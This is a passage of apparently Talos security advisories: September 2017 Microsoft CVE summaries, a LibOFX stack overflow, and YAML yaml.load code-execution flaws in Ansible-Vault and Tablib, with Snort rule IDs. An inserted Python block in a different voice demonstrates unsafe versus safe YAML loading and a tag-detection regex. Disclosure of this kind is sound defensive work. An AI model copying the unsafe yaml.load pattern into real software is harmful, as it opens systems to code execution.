A vulnerability has been identified in the VM Host Agent Service of Remote Desktop Virtual Host that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improperly validating input from an authenticated user within a guest operating system. Exploitation of this flaw is achievable if an attacker issues a "specially crafted certificate" within a guest operating system, causing the "VM host agent service on the host operating system to execute arbitrary code." Microsoft notes that the Remote Desktop Virtual Host role is not enabled by default.

CVE-2017-8739 - Scripting Engine Information Disclosure Vulnerability


A vulnerability in Microsoft Edge has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining information that could then be used to further exploit the system. Users who visit a specially crafted web page under the control of the attacker could be exploited.

CVE-2017-8692 - Uniscribe Remote Code Execution Vulnerability


An arbitrary code execution vulnerability has been identified in Windows Uniscribe that could allow an attacker to execute code in the context of the current user. This vulnerability manifests due to Uniscribe improperly handling objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability.

CVE-2017-8593 - Win32k Elevation of Privilege Vulnerability


A vulnerability in Windows Kernel Mode Drivers has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability could result in an attacker being able to execute arbitrary code in kernel mode. An attacker who executes a specially crafted executable could exploit this vulnerability and as a result, gain full control of the affected system.

CVE-2017-8720 - Win32k Elevation of Privilege Vulnerability


A vulnerability in the Win32k component in Windows has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specially crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-8683 - Win32k Graphics Information Disclosure Vulnerability


An information disclosure vulnerability has been identified in the Windows Graphics Component that could allow an attacker to gain information about the host. This vulnerability manifests due to the Graphics Component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

CVE-2017-8678 - Win32k Information Disclosure Vulnerability


An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information about the host. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

Multiple CVEs - Win32k Information Disclosure Vulnerability


Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) component that could allow an attacker to gain information about the host. These vulnerabilities manifest due to the GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8677
  • CVE-2017-8680
  • CVE-2017-8681

CVE-2017-8687 - Win32k Information Disclosure Vulnerability


An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the "memory address of a kernel object," allowing an attacker to leverage the information to further compromise the host.

CVE-2017-8702 - Windows Elevation of Privilege Vulnerability


A vulnerability in the Windows Error Reporting (WER) has been identified that could allow a privilege escalation attack to occur. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system.

Multiple CVEs - Windows GDI+ Information Disclosure Vulnerability


Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. These vulnerabilities manifest due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8684
  • CVE-2017-8685
  • CVE-2017-8688

CVE-2017-8710 - Windows Information Disclosure Vulnerability


An information disclosure vulnerability in the Windows System Information Console has been identified that could allow an attacker to read arbitrary files on an affected system. This vulnerability manifests due to improper parsing of XML input which contains a reference to an external entity. An attacker who creates a specially crafted file containing XML content and either opens the file or socially engineers a user into opening the file on an affected system could exploit this vulnerability.

Multiple CVEs - Windows Kernel Information Disclosure Vulnerability


Multiple information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker to gain information about the host. These vulnerabilities manifest due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8679
  • CVE-2017-8709
  • CVE-2017-8719

CVE-2017-8708 - Windows Kernel Information Disclosure Vulnerability


An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel failing to properly initialize a memory address. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the "base address of the kernel driver from a compromised process," allowing an attacker to leverage the information to further compromise the host.

CVE-2017-8716 - Windows Security Feature Bypass Vulnerability


A vulnerability has been identified in Windows Control Flow Guard that could allow an attacker to bypass its intended function. This vulnerability manifests due to Control Flow Guard mishandling objects in memory. An attacker who runs a specially crafted executable on an affected host could exploit this vulnerability.

CVE-2017-8699 - Windows Shell Remote Code Execution Vulnerability


An arbitrary code execution vulnerability has been identified in the Windows Shell that could allow an attacker to execute code in the context of the current user. This vulnerability manifests as a result of the Windows Shell improperly validating file copy destinations. A user who opens a specially crafted file could be exploited. Scenarios where an end user could be compromised include email-based attacks, where an attacker sends the victim a malicious attachment that the user opens, or web-based attacks where the user downloads and opens a malicious file.

Vulnerabilities Rated Moderate


The following vulnerabilities are rated "moderate" by Microsoft:
  • CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability
  • CVE-2017-8735 - Internet Explorer Memory Corruption Vulnerability
The following briefly describes these vulnerabilities.

CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability


A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.

CVE-2017-8735 - Microsoft Edge Spoofing Vulnerability


A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or if the user navigates to a specially crafted web page under the control of the attacker.

Coverage


In response to these vulnerability disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:
  • 42285-42286
  • 42311-42312
  • 42749-42750
  • 44331-44336
  • 44338-44343
  • 44349-44350
  • 44353-44357

Vulnerability Spotlight: LibOFX Tag Parsing Code Execution Vulnerability

This vulnerability was discovered by Cory Duplantis of Talos

Overview


LibOFX is an open source implementation of OFX (Open Financial Exchange), an open format used by financial institutions to share financial data with clients. As an implementation of a complex standard, this library is used by financial software such as GnuCash. Talos has discovered an exploitable buffer overflow in the implementation: a specially crafted OFX file can cause an out-of-bounds write resulting in code execution. This vulnerability is not currently patched, and Talos has not received a response from the developers within the period specified by the Vendor Vulnerability Reporting and Disclosure Policy.



TALOS-2017-0317 (CVE-2017-2816) - LibOFX Tag Parsing Code Execution Vulnerability


Ironically, the vulnerability is located in the way that tags are parsed by the sanitize function. In this function, tag names are stored in a local buffer on the stack, so an overly long tag name results in a stack overflow.

More details can be found in the vulnerability report: TALOS-2017-0317

Tested Version: LibOFX 0.9.11

Discussion


As an open source library, LibOFX may be used in various financial applications. This vulnerability presents many attractive features for attackers. User interaction is not necessarily required to trigger the vulnerability, and any systems presenting with this vulnerability are likely to contain valuable financial information which can be stolen to conduct identity theft, fraud, or easily sold on to other criminals.

Organisations may not be aware of the presence of this library being used to parse OFX files in third party software, or in software that has been developed as part of an in-house system. Keeping track of open source libraries used within in-house projects, and quickly applying patches supplied by third party vendors is vital to ensure that vulnerabilities such as these, which are particularly enticing to attackers, are properly managed.

Coverage


The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 42277-4227

Vulnerability Spotlight: YAML Parsing Remote Code Execution Vulnerabilities in Ansible Vault and Tablib

Vulnerabilities discovered by Cory Duplantis of Talos.

Talos is disclosing the presence of remote code execution vulnerabilities in the processing of Yet Another Markup Language (YAML) content in Ansible Vault and Tablib. Attackers can exploit these vulnerabilities by supplying malicious YAML content to execute arbitrary commands on vulnerable systems.

Overview


YAML is a data serialisation markup format which is designed to be readable for humans yet easily parsed by machines. Many tools and libraries have been developed to parse YAML data. The Python YAML parsing library PyYAML provides two API calls to parse YAML data: yaml.load and yaml.safe_load. The former API does not correctly sanitise YAML input which allows attackers to embed Python code to be executed within YAML content.

Applications which include the PyYAML library and call yaml.load and not yaml.safe_load are vulnerable to remote code execution vulnerabilities.
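To illustrate the yaml.load versus yaml.safe_load distinction described above, here is an added Python example (not code from Talos, Ansible-Vault or Tablib) that parses a constructed document carrying a benign !!python/tuple tag with both loaders: the full loader builds a Python object from the tag, while safe_load rejects it. The helper names classify and detect_python_tags are this example's own.

```python
import re
import yaml

# Constructed sample documents. A "!!python/..." tag is how a YAML document
# asks PyYAML to build Python objects; a harmless tuple is used here so the
# mechanism is visible without constructing anything dangerous.
TAGGED_DOC = "pair: !!python/tuple [1, 2]\n"
PLAIN_DOC = "pair: [1, 2]\n"

# Coarse triage pattern for spotting Python-specific tags in YAML at rest
# (e.g. vault files or databooks received from outside). It is a review aid,
# not a substitute for loading with safe_load.
PYTHON_TAG = re.compile(r"!!python/[\w/.:]+")


def load_with_full_loader(text):
    """The vulnerable pattern: yaml.Loader resolves python/* tags and
    instantiates whatever objects they name."""
    return yaml.load(text, Loader=yaml.Loader)


def load_safely(text):
    """The fix: safe_load knows only the core YAML types (str, int, list,
    dict, ...) and raises ConstructorError for any python/* tag."""
    return yaml.safe_load(text)


def classify(text):
    """Return ("ok", data) when safe_load accepts the document, or
    ("rejected", reason) when it refuses a tag it cannot construct."""
    try:
        return ("ok", yaml.safe_load(text))
    except yaml.constructor.ConstructorError as exc:
        return ("rejected", exc.problem)


def detect_python_tags(text):
    """List every !!python/ tag found in the text, in document order."""
    return PYTHON_TAG.findall(text)


if __name__ == "__main__":
    # Full loader: the tag becomes a real Python tuple.
    print(load_with_full_loader(TAGGED_DOC))   # {'pair': (1, 2)}
    # safe_load: the same document is rejected outright.
    print(classify(TAGGED_DOC))
    # Ordinary data is unaffected by switching to safe_load.
    print(load_safely(PLAIN_DOC))              # {'pair': [1, 2]}
    print(detect_python_tags(TAGGED_DOC))      # ['!!python/tuple']
```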

TALOS-2017-0305 Remote Code Execution Vulnerability in Ansible-Vault Library. (CVE-2017-2809)

Ansible provides an easy solution for automating IT and network based tasks. For ease of use these tasks are described in YAML. Ansible-Vault is a third party Python library for viewing and modifying Ansible Vault files. The vulnerability exists in this third party library when viewing an encrypted vault file. When loading the encrypted YAML code, the application calls the unsafe API call yaml.load. This vulnerability allows a malicious user to cause remote code execution in the context of the current user.

This third party Python library is distinct from the core functionality of Ansible Vault provided by Ansible, which is not subject to this vulnerability.

More technical details can be found in the Talos Vulnerability Report

TALOS-2017-0307 Remote Code Execution Vulnerability in Tablib. (CVE-2017-2810)

Tablib is a Python dataset library which allows programs to easily access, write and manage tabular data files. The library itself is widely used inside many applications including the django-import-export application.

The databook functionality of Tablib also includes a call to the unsafe API call yaml.load. This fails to correctly sanitise user supplied YAML code. A malicious user may include arbitrary code within YAML code included in a databook, which can be executed in the context of the current user.

More technical details can be found in the Talos Vulnerability Report

Coverage


The following Snort Rules will detect exploitation attempts of these vulnerabilities. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort rules: 42195-42196

We would like to thank to Dylan Ayrey for his collaboration on TALOS-2017-0305.